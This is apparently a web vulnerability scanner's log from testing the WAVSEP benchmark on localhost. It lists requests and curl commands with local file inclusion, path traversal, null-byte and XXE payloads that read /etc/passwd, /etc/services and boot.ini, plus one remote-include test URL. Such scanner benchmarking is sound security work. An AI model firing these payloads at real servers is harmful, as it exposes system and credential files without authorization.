curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
